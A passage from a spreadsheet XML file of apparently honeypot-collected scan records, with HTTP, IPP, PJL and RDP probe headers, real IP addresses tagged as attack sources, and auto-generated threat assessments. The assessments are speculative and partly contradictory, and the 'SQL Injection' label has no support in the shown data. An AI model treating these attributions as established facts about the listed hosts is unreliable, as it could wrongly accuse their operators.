'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}</t>
  </si>
  <si>
    <t>::ffff:a75e:8aa9</t>
  </si>
  <si>
    <t>This indicates an FTP connection attempt but no data was sent or received, suggesting an attacker probing for vulnerabilities. The lack of data transfer raises suspicions of reconnaissance or scanning activity. Further analysis is needed to confirm malicious intent. &amp;&amp; Unknown IMAP activity detected, possibly a scan or login attempt. No further information available from this log entry. Activity may indicate an unauthorized attempt to access the system's email service. &amp;&amp; No FTP login attempts detected, indicating lack of malicious activity in this area. No attempts to exploit or access sensitive information via FTP have been observed. Normal service operation is likely occurring for the FTP functionality. &amp;&amp; Possible malicious activity: Unauthorized access to a database service, no local user is logged in, and a program named zgrab2 was involved. This could indicate an attempt to exploit the service for data extraction or other malicious purposes.</t>
  </si>
  <si>
    <t>Brute Force &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>db37d4fe4de1f37fb3068ce4b641eb0c</t>
  </si>
  <si>
    <t>148.153.56.86</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;443&amp;&amp;445&amp;&amp;22&amp;&amp;1080&amp;&amp;5900&amp;&amp;631&amp;&amp;80&amp;&amp;389&amp;&amp;9065&amp;&amp;12945&amp;&amp;8443&amp;&amp;NA</t>
  </si>
  <si>
    <t>63199</t>
  </si>
  <si>
    <t>CDS Global Cloud Co., Ltd</t>
  </si>
  <si>
    <t>2016-01-12</t>
  </si>
  <si>
    <t>CDSC-1</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JbhH'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Imu2'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/w6Bm'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/wDOS'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/xERM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/JNrS'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/pYNE'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/1hwM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/LPfZ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AoJc'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/8vLb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/UX9w'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/6oMj'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/lE8t'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Nh6p'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/qLo1'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9dvI'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/INLy'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/zc8H'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/TmFU'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/tA9o'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/AYKw'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/ZY5u'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9Rih'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/VBpU'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/YkWA'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/l5Zb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/9ljM'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Iz4f'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.209.6:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aZh9'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/bX3p'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Y6Xu'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/Bpr9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/yRKF'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/di9W'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab9'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/OXoF'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/eJcK'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/aab8'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.1.slim.min.js'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/jquery-3.3.2.slim.min.js'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/hWXE'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': '/DvRQ'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0', 'method': 'GET', 'uri': 